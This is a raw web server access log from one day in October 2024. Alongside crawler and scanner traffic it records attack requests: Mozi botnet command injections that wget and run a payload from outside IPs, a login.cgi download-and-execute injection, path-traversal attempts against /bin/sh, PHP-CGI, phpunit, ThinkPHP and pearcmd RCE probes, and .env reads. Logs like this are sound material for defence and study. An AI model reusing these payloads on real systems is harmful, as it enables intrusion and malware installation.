20.217.82.205 - - [01/Oct/2024:20:20:22 +0200] "GET //info.php?sifra=dbm020%27&skupina=0 HTTP/1.1" 200 16965 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
20.217.82.205 - - [01/Oct/2024:20:20:23 +0200] "GET //info.php?sifra=dbm020&skupina=0%27 HTTP/1.1" 200 17533 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
20.217.82.205 - - [01/Oct/2024:20:20:23 +0200] "GET //info.php?sifra=kos%20001%27&skupina=0 HTTP/1.1" 200 16968 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
20.217.82.205 - - [01/Oct/2024:20:20:23 +0200] "GET //info.php?sifra=kos%20001&skupina=0%27 HTTP/1.1" 200 17397 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
66.249.66.44 - - [01/Oct/2024:20:27:25 +0200] "GET /info.php?sifra=95DNS&skupina=0 HTTP/1.1" 200 17022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.230.66.18 - - [01/Oct/2024:20:42:10 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.189:10522/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 - "-" "-"
66.249.66.42 - - [01/Oct/2024:20:44:44 +0200] "GET /info.php?sifra=16878&skupina=82 HTTP/1.1" 200 18780 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:20:48:48 +0200] "GET /info.php?sifra=HDEm140HW&skupina=86 HTTP/1.1" 200 19864 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
197.58.187.246 - - [01/Oct/2024:20:54:18 +0200] "GET /" 400 474 "-" "-"
198.235.24.167 - - [01/Oct/2024:21:27:31 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
34.78.6.216 - - [01/Oct/2024:21:44:26 +0200] "GET / HTTP/1.1" 200 20819 "-" "python-requests/2.32.3"
130.61.84.132 - - [01/Oct/2024:21:51:21 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:26 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:30 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:31 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:33 +0200] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:34 +0200] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:36 +0200] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:38 +0200] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:42 +0200] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:44 +0200] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:46 +0200] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:49 +0200] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:50 +0200] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:53 +0200] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:55 +0200] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:51:58 +0200] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:01 +0200] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:04 +0200] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:06 +0200] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:09 +0200] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:12 +0200] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:14 +0200] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:17 +0200] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:20 +0200] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:22 +0200] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:25 +0200] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:26 +0200] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:28 +0200] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:30 +0200] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:32 +0200] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:35 +0200] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:37 +0200] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:40 +0200] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:43 +0200] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:47 +0200] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:50 +0200] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:52 +0200] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:54 +0200] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:56 +0200] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:52:59 +0200] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:53:02 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:53:06 +0200] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:53:08 +0200] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
130.61.84.132 - - [01/Oct/2024:21:53:16 +0200] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
197.60.66.174 - - [01/Oct/2024:22:06:11 +0200] "GET /" 400 474 "-" "-"
197.60.66.174 - - [01/Oct/2024:22:06:11 +0200] "GET /" 400 474 "-" "-"
37.139.5.66 - - [01/Oct/2024:22:23:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 226 "-" "linus-torvalds-loves-you"
66.249.66.43 - - [01/Oct/2024:22:37:42 +0200] "GET /info.php?sifra=HDEM105m&skupina=86 HTTP/1.1" 200 19181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
59.88.237.162 - - [01/Oct/2024:23:34:12 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.88.237.162:55268/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 - "-" "-"
66.249.66.43 - - [01/Oct/2024:00:02:12 +0200] "GET /info.php?sifra=kos%20001&skupina=0 HTTP/1.1" 200 17389 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.23.243.224 - - [01/Oct/2024:00:53:56 +0200] "\x16\x03\x01" 200 20819 "-" "-"
64.23.243.224 - - [01/Oct/2024:00:53:57 +0200] "\x16\x03\x01" 200 20819 "-" "-"
64.23.243.224 - - [01/Oct/2024:00:53:57 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.23.243.224 - - [01/Oct/2024:00:53:58 +0200] "GET /form.html HTTP/1.1" 404 - "-" "curl/8.1.2"
64.23.243.224 - - [01/Oct/2024:00:53:58 +0200] "GET /upl.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
64.23.243.224 - - [01/Oct/2024:00:53:58 +0200] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
64.23.243.224 - - [01/Oct/2024:00:53:59 +0200] "GET /geoip/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.23.243.224 - - [01/Oct/2024:00:53:59 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.23.243.224 - - [01/Oct/2024:00:53:59 +0200] "GET /1.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.23.243.224 - - [01/Oct/2024:00:54:00 +0200] "GET /systembc/password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.23.243.224 - - [01/Oct/2024:00:54:00 +0200] "GET /password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
66.249.66.42 - - [01/Oct/2024:01:24:44 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.216.150.163 - - [01/Oct/2024:01:41:48 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.44 - - [01/Oct/2024:01:55:30 +0200] "GET /info.php?sifra=52564&skupina=0 HTTP/1.1" 200 17183 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
41.233.91.132 - - [01/Oct/2024:01:55:41 +0200] "GET /" 400 474 "-" "-"
66.249.66.44 - - [01/Oct/2024:01:59:22 +0200] "GET /info.php?sifra=HDEm180HW&skupina=82 HTTP/1.1" 200 20292 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [01/Oct/2024:02:37:09 +0200] "GET /slike/IMG_2249-3.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
197.58.150.8 - - [01/Oct/2024:02:56:08 +0200] "GET /" 400 474 "-" "-"
167.94.138.127 - - [01/Oct/2024:03:52:37 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.138.127 - - [01/Oct/2024:03:52:43 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.127 - - [01/Oct/2024:03:52:53 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
66.249.66.42 - - [01/Oct/2024:04:21:20 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [01/Oct/2024:04:21:20 +0200] "GET /skupine.php?skupina=34 HTTP/1.1" 200 25579 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.209.251.76 - - [01/Oct/2024:04:25:05 +0200] "OPTIONS / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
167.94.138.35 - - [01/Oct/2024:04:27:43 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.138.35 - - [01/Oct/2024:04:27:49 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [01/Oct/2024:04:27:51 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [01/Oct/2024:04:27:53 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
66.249.66.42 - - [01/Oct/2024:04:37:18 +0200] "GET /skupine.php?skupina=42&stran=5 HTTP/1.1" 200 19904 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.117.241.82 - - [01/Oct/2024:04:42:42 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
156.204.249.227 - - [01/Oct/2024:04:57:53 +0200] "GET /" 400 474 "-" "-"
66.249.66.42 - - [01/Oct/2024:05:14:12 +0200] "GET /info.php?sifra=559510&skupina=40 HTTP/1.1" 200 17551 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.147.199.99 - - [01/Oct/2024:05:24:44 +0200] "GET / HTTP/1.0" 200 20819 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
66.249.66.44 - - [01/Oct/2024:05:33:25 +0200] "GET /info.php?sifra=D120IBBI&skupina=39 HTTP/1.1" 200 17873 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.163.164 - - [01/Oct/2024:06:13:26 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.133.163.164 - - [01/Oct/2024:06:13:27 +0200] "POST / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.133.163.164 - - [01/Oct/2024:06:13:28 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.133.163.164 - - [01/Oct/2024:06:13:29 +0200] "POST / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
104.248.67.255 - - [01/Oct/2024:06:47:25 +0200] "GET /ab2g HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
104.248.67.255 - - [01/Oct/2024:06:47:25 +0200] "GET /ab2h HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
104.248.67.255 - - [01/Oct/2024:06:47:26 +0200] "GET /alive.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.67.255 - - [01/Oct/2024:06:47:30 +0200] "GET /" 400 474 "-" "-"
104.248.67.255 - - [01/Oct/2024:06:47:31 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.67.255 - - [01/Oct/2024:06:47:31 +0200] "GET /" 400 474 "-" "-"
104.248.67.255 - - [01/Oct/2024:06:47:32 +0200] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
104.248.67.255 - - [01/Oct/2024:06:47:32 +0200] "GET /" 400 474 "-" "-"
104.248.67.255 - - [01/Oct/2024:06:47:33 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.67.255 - - [01/Oct/2024:06:47:34 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
104.248.67.255 - - [01/Oct/2024:06:47:34 +0200] "GET /teorema505?t=1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
41.237.118.96 - - [01/Oct/2024:07:00:23 +0200] "GET /" 400 474 "-" "-"
41.237.118.96 - - [01/Oct/2024:07:01:06 +0200] "GET /" 400 474 "-" "-"
66.249.66.43 - - [01/Oct/2024:07:04:25 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
197.39.74.92 - - [01/Oct/2024:07:27:32 +0200] "GET /" 400 474 "-" "-"
117.198.12.147 - - [01/Oct/2024:08:00:01 +0200] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 - "-" "-"
66.249.66.44 - - [01/Oct/2024:08:07:11 +0200] "GET /info.php?sifra=HDEM135&skupina=82 HTTP/1.1" 200 19400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:08:11:52 +0200] "GET /skupine.php?skupina=63 HTTP/1.1" 200 24964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:08:47:35 +0200] "GET /info.php?sifra=V135&skupina=0 HTTP/1.1" 200 17161 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:09:35:19 +0200] "GET /kako.php HTTP/1.1" 200 18336 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
59.178.144.221 - - [01/Oct/2024:09:37:59 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 - "-" "-"
107.175.242.95 - - [01/Oct/2024:09:54:59 +0200] "POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.249.66.42 - - [01/Oct/2024:10:17:29 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.41 - - [01/Oct/2024:10:17:29 +0200] "GET /info.php?sifra=HDEM105m&skupina=82 HTTP/1.1" 200 19107 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.207.242.158 - - [01/Oct/2024:10:19:59 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/98.0.4758.132 Safari/537.36"
156.220.64.77 - - [01/Oct/2024:11:04:05 +0200] "GET /" 400 474 "-" "-"
66.249.66.42 - - [01/Oct/2024:11:35:19 +0200] "GET /info.php?sifra=E260&skupina=83 HTTP/1.1" 200 18961 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:11:35:20 +0200] "GET /info.php?sifra=E650&skupina=83 HTTP/1.1" 200 18919 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [01/Oct/2024:11:40:30 +0200] "GET /info.php?sifra=4RP/S&skupina=31 HTTP/1.1" 200 17740 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [01/Oct/2024:12:03:29 +0200] "GET /slike/MC2131_260.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
41.233.30.5 - - [01/Oct/2024:12:49:12 +0200] "GET /" 400 474 "-" "-"
162.216.149.239 - - [01/Oct/2024:13:22:11 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
84.0.95.140 - - [01/Oct/2024:14:22:02 +0200] "GET / HTTP/1.0" 200 8230 "-" "-"
197.55.250.138 - - [01/Oct/2024:14:26:19 +0200] "GET /" 400 474 "-" "-"
120.195.30.140 - - [01/Oct/2024:15:27:02 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
